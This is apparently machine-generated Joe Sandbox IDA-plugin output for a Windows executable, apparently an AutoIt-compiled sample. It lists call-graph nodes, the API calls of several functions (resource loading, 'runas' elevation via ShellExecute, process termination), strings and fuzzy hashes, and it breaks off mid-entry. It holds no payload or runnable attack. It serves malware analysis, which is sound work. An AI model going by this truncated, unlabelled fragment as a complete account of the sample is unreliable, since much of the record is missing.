97387->97391 97388->97384 97393 777138 97390->97393 97394 77701b 97391->97394 97392 777050 97395 777063 97392->97395 97398 704c6d 22 API calls 97392->97398 97396 707510 53 API calls 97393->97396 97397 706350 22 API calls 97394->97397 97400 707510 53 API calls 97395->97400 97405 777069 97395->97405 97399 777145 97396->97399 97397->97375 97398->97395 97699 70525f 97399->97699 97402 7770a0 97400->97402 97856 76d076 57 API calls 97402->97856 97403 777166 97406 704c6d 22 API calls 97403->97406 97405->97374 97407 777175 97406->97407 97408 7771a9 97407->97408 97410 704c6d 22 API calls 97407->97410 97409 70a8c7 22 API calls 97408->97409 97411 7771ba 97409->97411 97412 777186 97410->97412 97413 706350 22 API calls 97411->97413 97412->97408 97414 706b57 22 API calls 97412->97414 97415 7771c8 97413->97415 97416 77719b 97414->97416 97417 706350 22 API calls 97415->97417 97418 706b57 22 API calls 97416->97418 97419 7771d6 97417->97419 97418->97408 97420 706350 22 API calls 97419->97420 97421 7771e4 97420->97421 97422 707510 53 API calls 97421->97422 97423 7771f0 97422->97423 97741 76d7bc 97423->97741 97425 777201 97426 76d4ce 4 API calls 97425->97426 97427 77720b 97426->97427 97428 707510 53 API calls 97427->97428 97432 777239 97427->97432 97429 777229 97428->97429 97795 772947 97429->97795 97431 704f39 68 API calls 97431->97374 97432->97431 97886 76dbbe lstrlenW 97433->97886 97437 777474 97436->97437 97438 777469 97436->97438 97441 70a961 22 API calls 97437->97441 97475 777554 97437->97475 97439 70b567 39 API calls 97438->97439 97439->97437 97440 71fddb 22 API calls 97442 777587 97440->97442 97444 777495 97441->97444 97443 71fe0b 22 API calls 97442->97443 97445 777598 97443->97445 97446 70a961 22 API calls 97444->97446 97891 706246 97445->97891 97448 77749e 97446->97448 97450 707510 53 API calls 97448->97450 97452 7774aa 97450->97452 97451 70a961 22 API calls 97454 7775ab 97451->97454 97453 70525f 22 API calls 97452->97453 97455 7774bf 97453->97455 97456 706246 CloseHandle 
97454->97456 97457 706350 22 API calls 97455->97457 97458 7775b2 97456->97458 97459 7774f2 97457->97459 97460 707510 53 API calls 97458->97460 97461 77754a 97459->97461 97463 76d4ce 4 API calls 97459->97463 97462 7775be 97460->97462 97465 70b567 39 API calls 97461->97465 97464 706246 CloseHandle 97462->97464 97466 777502 97463->97466 97467 7775c8 97464->97467 97465->97475 97466->97461 97468 777506 97466->97468 97895 705745 97467->97895 97469 709cb3 22 API calls 97468->97469 97471 777513 97469->97471 97918 76d2c1 26 API calls 97471->97918 97473 7776de GetLastError 97477 7776f7 97473->97477 97474 7775ea 97903 7053de 97474->97903 97475->97440 97491 7776a4 97475->97491 97922 706216 CloseHandle messages 97477->97922 97480 7775f8 97919 7053c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97480->97919 97482 77751c 97482->97461 97483 777645 97484 71fddb 22 API calls 97483->97484 97487 777679 97484->97487 97485 7775ff 97485->97483 97486 777619 97485->97486 97920 76ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 97486->97920 97489 70a961 22 API calls 97487->97489 97490 777686 97489->97490 97490->97491 97921 76417d 22 API calls __fread_nolock 97490->97921 97491->97317 97941 709c6e 97493->97941 97496 71fddb 22 API calls 97498 71f02b 97496->97498 97499 71fe0b 22 API calls 97498->97499 97502 71f03c 97499->97502 97500 71f0a4 97504 70b567 39 API calls 97500->97504 97508 71f0b1 97500->97508 97501 75f0a8 97501->97500 97974 779caa 39 API calls 97501->97974 97503 706246 CloseHandle 97502->97503 97505 71f047 97503->97505 97506 75f10a 97504->97506 97507 70a961 22 API calls 97505->97507 97506->97508 97509 75f112 97506->97509 97510 71f04f 97507->97510 97512 71fa5b 3 API calls 97508->97512 97513 70b567 39 API calls 97509->97513 97511 706246 CloseHandle 97510->97511 97514 71f056 97511->97514 97518 71f0b8 97512->97518 97513->97518 97515 707510 53 API calls 97514->97515 97516 71f062 97515->97516 97517 706246 CloseHandle 97516->97517 97519 71f06c 97517->97519 97520 
75f127 97518->97520 97521 71f0d3 97518->97521 97522 705745 5 API calls 97519->97522 97524 71fe0b 22 API calls 97520->97524 97523 706270 22 API calls 97521->97523 97525 71f07d 97522->97525 97526 71f0db 97523->97526 97527 75f12c 97524->97527 97528 71f085 97525->97528 97529 75f0a0 97525->97529 97955 71f141 97526->97955 97531 75f140 97527->97531 97975 71f866 ReadFile SetFilePointerEx 97527->97975 97536 7053de 27 API calls 97528->97536 97973 706216 CloseHandle messages 97529->97973 97539 75f144 __fread_nolock 97531->97539 97976 770e85 22 API calls ___scrt_fastfail 97531->97976 97534 71f0ea 97534->97539 97970 7062b5 22 API calls 97534->97970 97538 71f093 97536->97538 97969 7053c7 SetFilePointerEx SetFilePointerEx SetFilePointerEx 97538->97969 97541 71f0fe 97542 71f138 97541->97542 97545 706246 CloseHandle 97541->97545 97542->97317 97543 71f09a 97543->97500 97544 75f069 97543->97544 97972 76ccff SetFilePointerEx SetFilePointerEx SetFilePointerEx WriteFile 97544->97972 97546 71f12c 97545->97546 97546->97542 97971 706216 CloseHandle messages 97546->97971 97548 75f080 97548->97500 97550->97320 97551->97278 97552->97281 97553->97291 97554->97303 97555->97303 97556->97280 97557->97316 97558->97316 97559->97316 97560->97312 97561->97316 97562->97341 97563->97343 97564->97342 97565->97346 97604 707510 97566->97604 97570 78844f 97668 788ee4 60 API calls 97570->97668 97571 787fd5 messages 97571->97349 97574 78845e 97576 78846a 97574->97576 97577 78828f 97574->97577 97575 788049 97575->97571 97578 707510 53 API calls 97575->97578 97591 788281 97575->97591 97659 76417d 22 API calls __fread_nolock 97575->97659 97660 78851d 42 API calls _strftime 97575->97660 97576->97571 97640 787e86 97577->97640 97578->97575 97583 7882c8 97655 71fc70 97583->97655 97586 7882e8 97661 77359c 82 API calls __wsopen_s 97586->97661 97587 788302 97662 7063eb 22 API calls 97587->97662 97590 7882f3 GetCurrentProcess TerminateProcess 97590->97587 97591->97570 97591->97577 97592 788311 97663 706a50 22 API calls 
97592->97663 97594 78832a 97603 788352 97594->97603 97664 7104f0 22 API calls 97594->97664 97596 7884c5 97596->97571 97598 7884d9 FreeLibrary 97596->97598 97597 788341 97665 788b7b 75 API calls 97597->97665 97598->97571 97603->97596 97666 7104f0 22 API calls 97603->97666 97667 70aceb 23 API calls messages 97603->97667 97669 788b7b 75 API calls 97603->97669 97605 707522 97604->97605 97606 707525 97604->97606 97605->97571 97627 788cd3 97605->97627 97607 70755b 97606->97607 97608 70752d 97606->97608 97610 7450f6 97607->97610 97613 70756d 97607->97613 97618 74500f 97607->97618 97670 7251c6 26 API calls 97608->97670 97673 725183 26 API calls 97610->97673 97611 70753d 97617 71fddb 22 API calls 97611->97617 97671 71fb21 51 API calls 97613->97671 97614 74510e 97614->97614 97619 707547 97617->97619 97621 71fe0b 22 API calls 97618->97621 97622 745088 97618->97622 97620 709cb3 22 API calls 97619->97620 97620->97605 97623 745058 97621->97623 97672 71fb21 51 API calls 97622->97672 97624 71fddb 22 API calls 97623->97624 97625 74507f 97624->97625 97626 709cb3 22 API calls 97625->97626 97626->97622 97628 70aec9 22 API calls 97627->97628 97629 788cee CharLowerBuffW 97628->97629 97674 768e54 97629->97674 97633 70a961 22 API calls 97634 788d2a 97633->97634 97681 706d25 97634->97681 97636 788d3e 97637 7093b2 22 API calls 97636->97637 97639 788d48 _wcslen 97637->97639 97638 788e5e _wcslen 97638->97575 97639->97638 97694 78851d 42 API calls _strftime 97639->97694 97641 787ea1 97640->97641 97645 787eec 97640->97645 97642 71fe0b 22 API calls 97641->97642 97643 787ec3 97642->97643 97644 71fddb 22 API calls 97643->97644 97643->97645 97644->97643 97646 789096 97645->97646 97647 7892ab messages 97646->97647 97654 7890ba _strcat _wcslen 97646->97654 97647->97583 97648 70b567 39 API calls 97648->97654 97649 70b38f 39 API calls 97649->97654 97650 70b6b5 39 API calls 97650->97654 97651 707510 53 API calls 97651->97654 97652 72ea0c 21 API calls ___std_exception_copy 97652->97654 97654->97647 
97654->97648 97654->97649 97654->97650 97654->97651 97654->97652 97698 76efae 24 API calls _wcslen 97654->97698 97658 71fc85 97655->97658 97656 71fd1d VirtualAlloc 97657 71fceb 97656->97657 97657->97586 97657->97587 97658->97656 97658->97657 97659->97575 97660->97575 97661->97590 97662->97592 97663->97594 97664->97597 97665->97603 97666->97603 97667->97603 97668->97574 97669->97603 97670->97611 97671->97611 97672->97610 97673->97614 97676 768e74 _wcslen 97674->97676 97675 768f63 97675->97633 97675->97639 97676->97675 97677 768f68 97676->97677 97679 768ea9 97676->97679 97677->97675 97696 71ce60 41 API calls 97677->97696 97679->97675 97695 71ce60 41 API calls 97679->97695 97682 706d91 97681->97682 97683 706d34 97681->97683 97685 7093b2 22 API calls 97682->97685 97683->97682 97684 706d3f 97683->97684 97686 744c9d 97684->97686 97687 706d5a 97684->97687 97690 706d62 __fread_nolock 97685->97690 97689 71fddb 22 API calls 97686->97689 97697 706f34 22 API calls 97687->97697 97691 744ca7 97689->97691 97690->97636 97692 71fe0b 22 API calls 97691->97692 97693 744cda 97692->97693 97694->97638 97695->97679 97696->97677 97697->97690 97698->97654 97700 70a961 22 API calls 97699->97700 97701 705275 97700->97701 97702 70a961 22 API calls 97701->97702 97703 70527d 97702->97703 97704 70a961 22 API calls 97703->97704 97705 705285 97704->97705 97706 70a961 22 API calls 97705->97706 97707 70528d 97706->97707 97708 743df5 97707->97708 97709 7052c1 97707->97709 97710 70a8c7 22 API calls 97708->97710 97711 706d25 22 API calls 97709->97711 97712 743dfe 97710->97712 97713 7052cf 97711->97713 97714 70a6c3 22 API calls 97712->97714 97715 7093b2 22 API calls 97713->97715 97719 705304 97714->97719 97716 7052d9 97715->97716 97717 706d25 22 API calls 97716->97717 97716->97719 97722 7052fa 97717->97722 97718 705349 97721 706d25 22 API calls 97718->97721 97719->97718 97720 705325 97719->97720 97737 743e20 97719->97737 97720->97718 97726 704c6d 22 API calls 97720->97726 97723 70535a 97721->97723 97724 
7093b2 22 API calls 97722->97724 97725 705370 97723->97725 97730 70a8c7 22 API calls 97723->97730 97724->97719 97727 705384 97725->97727 97732 70a8c7 22 API calls 97725->97732 97728 705332 97726->97728 97731 70538f 97727->97731 97734 70a8c7 22 API calls 97727->97734 97728->97718 97733 706d25 22 API calls 97728->97733 97729 706b57 22 API calls 97738 743ee0 97729->97738 97730->97725 97735 70a8c7 22 API calls 97731->97735 97739 70539a 97731->97739 97732->97727 97733->97718 97734->97731 97735->97739 97736 704c6d 22 API calls 97736->97738 97737->97729 97738->97718 97738->97736 97857 7049bd 22 API calls __fread_nolock 97738->97857 97739->97403 97742 76d7d8 97741->97742 97743 76d7f3 97742->97743 97744 76d7dd 97742->97744 97746 70a961 22 API calls 97743->97746 97745 76d7ee 97744->97745 97747 70a8c7 22 API calls 97744->97747 97745->97425 97748 76d7fb 97746->97748 97747->97745 97749 70a961 22 API calls 97748->97749 97750 76d803 97749->97750 97751 70a961 22 API calls 97750->97751 97752 76d80e 97751->97752 97753 70a961 22 API calls 97752->97753 97754 76d816 97753->97754 97755 70a961 22 API calls 97754->97755 97756 76d81e 97755->97756 97757 70a961 22 API calls 97756->97757 97758 76d826 97757->97758 97759 70a961 22 API calls 97758->97759 97760 76d82e 97759->97760 97761 70a961 22 API calls 97760->97761 97762 76d836 97761->97762 97763 70525f 22 API calls 97762->97763 97764 76d84d 97763->97764 97765 70525f 22 API calls 97764->97765 97766 76d866 97765->97766 97767 704c6d 22 API calls 97766->97767 97768 76d872 97767->97768 97769 76d885 97768->97769 97771 7093b2 22 API calls 97768->97771 97770 704c6d 22 API calls 97769->97770 97772 76d88e 97770->97772 97771->97769 97773 76d89e 97772->97773 97774 7093b2 22 API calls 97772->97774 97775 76d8b0 97773->97775 97776 70a8c7 22 API calls 97773->97776 97774->97773 97777 706350 22 API calls 97775->97777 97776->97775 97778 76d8bb 97777->97778 97858 76d978 22 API calls 97778->97858 97780 76d8ca 97859 76d978 22 API calls 97780->97859 97782 76d8dd 

                          Control-flow Graph
                          APIs
                          • GetVersionExW.KERNEL32(?), ref: 0070430D
                            • Part of subcall function 00706B57: _wcslen.LIBCMT ref: 00706B6A
                          • GetCurrentProcess.KERNEL32(?,0079CB64,00000000,?,?), ref: 00704422
                          • IsWow64Process.KERNEL32(00000000,?,?), ref: 00704429
                          • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00704454
                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00704466
                          • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00704474
                          • FreeLibrary.KERNEL32(00000000,?,?), ref: 0070447B
                          • GetSystemInfo.KERNEL32(?,?,?), ref: 007044A0
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                          • String ID: GetNativeSystemInfo$kernel32.dll$|O
                          • API String ID: 3290436268-3101561225
                          • Opcode ID: f79586b71dc1b5c502b7ca076a20587634b89a00823c0439d0e7c38f2c9a5bc0
                          • Instruction ID: 1ba8edc32495ae1932a08227b69b63547d38cc6de3133663d0d9cf5cdc4304ee
                          • Opcode Fuzzy Hash: f79586b71dc1b5c502b7ca076a20587634b89a00823c0439d0e7c38f2c9a5bc0
                          • Instruction Fuzzy Hash: 94A196A190B3C0FFCB12C769BD811957FF5AB26340B98D59BE18593B62D23C4505CB2E

                          Control-flow Graph
                          APIs
                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,007050AA,?,?,00000000,00000000), ref: 007042B2
                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,007050AA,?,?,00000000,00000000), ref: 007042C9
                          • LoadResource.KERNEL32(?,00000000,?,?,007050AA,?,?,00000000,00000000,?,?,?,?,?,?,00704F20), ref: 007435BE
                          • SizeofResource.KERNEL32(?,00000000,?,?,007050AA,?,?,00000000,00000000,?,?,?,?,?,?,00704F20), ref: 007435D3
                          • LockResource.KERNEL32(007050AA,?,?,007050AA,?,?,00000000,00000000,?,?,?,?,?,?,00704F20,?), ref: 007435E6
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                          • String ID: SCRIPT
                          • API String ID: 3051347437-3967369404
                          • Opcode ID: ac0b549b148f11757cb6b4b96f9f4c3b36635e77498994ac614e1a6a249d7538
                          • Instruction ID: 599e75663fc5a70eab8b69dcf99917400b7ef431546d65845ddad17ccdf96237
                          • Opcode Fuzzy Hash: ac0b549b148f11757cb6b4b96f9f4c3b36635e77498994ac614e1a6a249d7538
                          • Instruction Fuzzy Hash: 71117CB1200700FFDF228B65DC49F277BB9FBC5B51F10826AB502D6290DB75D8018630

                          Control-flow Graph

                          APIs
                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00702B6B
                            • Part of subcall function 00703A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,007D1418,?,00702E7F,?,?,?,00000000), ref: 00703A78
                            • Part of subcall function 00709CB3: _wcslen.LIBCMT ref: 00709CBD
                          • GetForegroundWindow.USER32(runas,?,?,?,?,?,007C2224), ref: 00742C10
                          • ShellExecuteW.SHELL32(00000000,?,?,007C2224), ref: 00742C17
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                          • String ID: runas
                          • API String ID: 448630720-4000483414
                          • Opcode ID: f5c92c82a0dd9c5ff8c8f537ac3e83f094fde0010a7e392d051062c0ac6dd3c1
                          • Instruction ID: 7a303786c9c27f9841ab62adc2cb0fe7734565264fc0b9abf49d0073d2f18e08
                          • Opcode Fuzzy Hash: f5c92c82a0dd9c5ff8c8f537ac3e83f094fde0010a7e392d051062c0ac6dd3c1
                          • Instruction Fuzzy Hash: 0F11B472208381EAC714FF60D89EA7EB7E89B91340F84562EF146521E3DF2D994AC712
                          APIs
                          • lstrlenW.KERNEL32(?,00745222), ref: 0076DBCE
                          • GetFileAttributesW.KERNELBASE(?), ref: 0076DBDD
                          • FindFirstFileW.KERNELBASE(?,?), ref: 0076DBEE
                          • FindClose.KERNEL32(00000000), ref: 0076DBFA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: FileFind$AttributesCloseFirstlstrlen
                          • String ID:
                          • API String ID: 2695905019-0
                          • Opcode ID: 34bd34cb432a12316e8f779c23cbad8631aa0c8496fac84019faeaa36b4114b3
                          • Instruction ID: d422385cfe6318e49c92ddcc0bca7532cf51438032b10b0e5ac425e928baefaa
                          • Opcode Fuzzy Hash: 34bd34cb432a12316e8f779c23cbad8631aa0c8496fac84019faeaa36b4114b3
                          • Instruction Fuzzy Hash: 72F0A0308209185BD631AB78AC0D8AA377CAF01334F508703F836C20E0EBB95D9686E9
                          APIs
                          • GetInputState.USER32 ref: 0070D807
                          • timeGetTime.WINMM ref: 0070DA07
                          • Sleep.KERNEL32(0000000A), ref: 0070DBB1
                          • Sleep.KERNEL32(0000000A), ref: 00752B76
                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00752C11
                          • WaitForSingleObject.KERNEL32(?,00000000), ref: 00752C29
                          • CloseHandle.KERNEL32(?), ref: 00752C3D
                          • Sleep.KERNEL32(?,CCCCCCCC,00000000), ref: 00752CA9
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: Sleep$CloseCodeExitHandleInputObjectProcessSingleStateTimeWaittime
                          • String ID:
                          • API String ID: 388478766-0
                          • Opcode ID: 16b5e07c6128a9fca3310891210ce806d06097f90a4bc19506949ba19d1ef639
                          • Instruction ID: 3de5b6d4c5d0d6a194d319e3ea2d74eee41c36e1060d5d10468091a0ee5ea82e
                          • Opcode Fuzzy Hash: 16b5e07c6128a9fca3310891210ce806d06097f90a4bc19506949ba19d1ef639
                          • Instruction Fuzzy Hash: BF42DF70604341EFD739CF64C848BAAB7E1BF86311F54861AE855872D2D7BCAC49CB92

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 00702D07
                          • RegisterClassExW.USER32(00000030), ref: 00702D31
                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00702D42
                          • InitCommonControlsEx.COMCTL32(?), ref: 00702D5F
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00702D6F
                          • LoadIconW.USER32(000000A9), ref: 00702D85
                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00702D94
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                          • API String ID: 2914291525-1005189915
                          • Opcode ID: dc78c59240b7bdb2d99cb9aa07ae2c7da0f7fb7dad14eaac23edebf59bfc8fce
                          • Instruction ID: 3e489d1f44f4e0a987e121135d6726ebd408b8109a05e72c3601300cf7c1daa0
                          • Opcode Fuzzy Hash: dc78c59240b7bdb2d99cb9aa07ae2c7da0f7fb7dad14eaac23edebf59bfc8fce
                          • Instruction Fuzzy Hash: 1721E3B1902248AFDF01DFA4EC59BDDBBB8FB08700F40811BF511A62A0D7B95541CFA8

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 313 738d45-738d55 314 738d57-738d6a call 72f2c6 call 72f2d9 313->314 315 738d6f-738d71 313->315 331 7390f1 314->331 317 738d77-738d7d 315->317 318 7390d9-7390e6 call 72f2c6 call 72f2d9 315->318 317->318 321 738d83-738dae 317->321 336 7390ec call 7327ec 318->336 321->318 324 738db4-738dbd 321->324 327 738dd7-738dd9 324->327 328 738dbf-738dd2 call 72f2c6 call 72f2d9 324->328 329 7390d5-7390d7 327->329 330 738ddf-738de3 327->330 328->336 335 7390f4-7390f9 329->335 330->329 334 738de9-738ded 330->334 331->335 334->328 338 738def-738e06 334->338 336->331 341 738e23-738e2c 338->341 342 738e08-738e0b 338->342 346 738e4a-738e54 341->346 347 738e2e-738e45 call 72f2c6 call 72f2d9 call 7327ec 341->347 344 738e15-738e1e 342->344 345 738e0d-738e13 342->345 348 738ebf-738ed9 344->348 345->344 345->347 350 738e56-738e58 346->350 351 738e5b-738e79 call 733820 call 7329c8 * 2 346->351 379 73900c 347->379 352 738edf-738eef 348->352 353 738fad-738fb6 call 73f89b 348->353 350->351 382 738e96-738ebc call 739424 351->382 383 738e7b-738e91 call 72f2d9 call 72f2c6 351->383 352->353 356 738ef5-738ef7 352->356 366 739029 353->366 367 738fb8-738fca 353->367 356->353 360 738efd-738f23 356->360 360->353 364 738f29-738f3c 360->364 364->353 369 738f3e-738f40 364->369 371 73902d-739045 ReadFile 366->371 367->366 372 738fcc-738fdb GetConsoleMode 367->372 369->353 374 738f42-738f6d 369->374 376 7390a1-7390ac GetLastError 371->376 377 739047-73904d 371->377 372->366 378 738fdd-738fe1 372->378 374->353 381 738f6f-738f82 374->381 384 7390c5-7390c8 376->384 385 7390ae-7390c0 call 72f2d9 call 72f2c6 376->385 377->376 386 73904f 377->386 378->371 387 738fe3-738ffd ReadConsoleW 378->387 380 73900f-739019 call 7329c8 379->380 380->335 381->353 393 738f84-738f86 381->393 382->348 383->379 390 739005-73900b call 72f2a3 384->390 391 7390ce-7390d0 384->391 385->379 397 739052-739064 386->397 388 738fff GetLastError 387->388 389 73901e-739027 387->389 388->390 
389->397 390->379 391->380 393->353 400 738f88-738fa8 393->400 397->380 404 739066-73906a 397->404 400->353 408 739083-73908e 404->408 409 73906c-73907c call 738a61 404->409 411 739090 call 738bb1 408->411 412 73909a-73909f call 7388a1 408->412 418 73907f-739081 409->418 419 739095-739098 411->419 412->419 418->380 419->418
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.00000000007C2000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101993850.00000000007CC000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2102013525.00000000007D4000.00000002.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_700000_Rgh99876k7e.jbxd
                          Similarity
                          • API ID:
                          • String ID: .r
                          • API String ID: 0-397233886
                          • Opcode ID: 2ca0a767030ac3231e6f8209e74b2fbdc42a82379da40d9e5422bbaed7f4787e
                          • Instruction ID: 692916969912b000616d9d3dd1027c5642aba0b4fdf7ee25fd58b7e65c4dc2c7
                          • Opcode Fuzzy Hash: 2ca0a767030ac3231e6f8209e74b2fbdc42a82379da40d9e5422bbaed7f4787e
                          • Instruction Fuzzy Hash: 6CC1F075A0434AEFEB159FA8D844BADBBB0BF09310F144099F554AB393C77C9941CB62

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 421 74065b-74068b call 74042f 424 7406a6-7406b2 call 735221 421->424 425 74068d-740698 call 72f2c6 421->425 430 7406b4-7406c9 call 72f2c6 call 72f2d9 424->430 431 7406cb-740714 call 74039a 424->431 432 74069a-7406a1 call 72f2d9 425->432 430->432 440 740716-74071f 431->440 441 740781-74078a GetFileType 431->441 442 74097d-740983 432->442 446 740756-74077c GetLastError call 72f2a3 440->446 447 740721-740725 440->447 443 7407d3-7407d6 441->443 444 74078c-7407bd GetLastError call 72f2a3 CloseHandle 441->444 449 7407df-7407e5 443->449 450 7407d8-7407dd 443->450 444->432 458 7407c3-7407ce call 72f2d9 444->458 446->432 447->446 451 740727-740754 call 74039a 447->451 455 7407e9-740837 call 73516a 449->455 456 7407e7 449->456 450->455 451->441 451->446 464 740847-74086b call 74014d 455->464 465 740839-740845 call 7405ab 455->465 456->455 458->432 471 74086d 464->471 472 74087e-7408c1 464->472 465->464 470 74086f-740879 call 7386ae 465->470 470->442 471->470 474 7408e2-7408f0 472->474 475 7408c3-7408c7 472->475 478 7408f6-7408fa 474->478 479 74097b 474->479 475->474 477 7408c9-7408dd 475->477 477->474 478->479 480 7408fc-74092f CloseHandle call 74039a 478->480 479->442 483 740931-74095d GetLastError call 72f2a3 call 735333 480->483 484 740963-740977 480->484 483->484 484->479
                          APIs
                            • Part of subcall function 0074039A: CreateFileW.KERNELBASE(00000000,00000000,?,00740704,?,?,00000000,?,00740704,00000000,0000000C), ref: 007403B7
                          • GetLastError.KERNEL32 ref: 0074076F
                          • __dosmaperr.LIBCMT ref: 00740776
                          • GetFileType.KERNELBASE(00000000), ref: 00740782
                          • GetLastError.KERNEL32 ref: 0074078C
                          • __dosmaperr.LIBCMT ref: 00740795
                          • CloseHandle.KERNEL32(00000000), ref: 007407B5
                          • CloseHandle.KERNEL32(?), ref: 007408FF
                          • GetLastError.KERNEL32 ref: 00740931
                          • __dosmaperr.LIBCMT ref: 00740938
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2101900879.0000000000701000.00000020.00000001.01000000.00000003.sdmp, Offset: 00700000, based on PE: true
                          • Associated: 00000000.00000002.2101885104.0000000000700000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2101948653.000000000079C000.00000002.00000001.01000000.00000003.sdmp
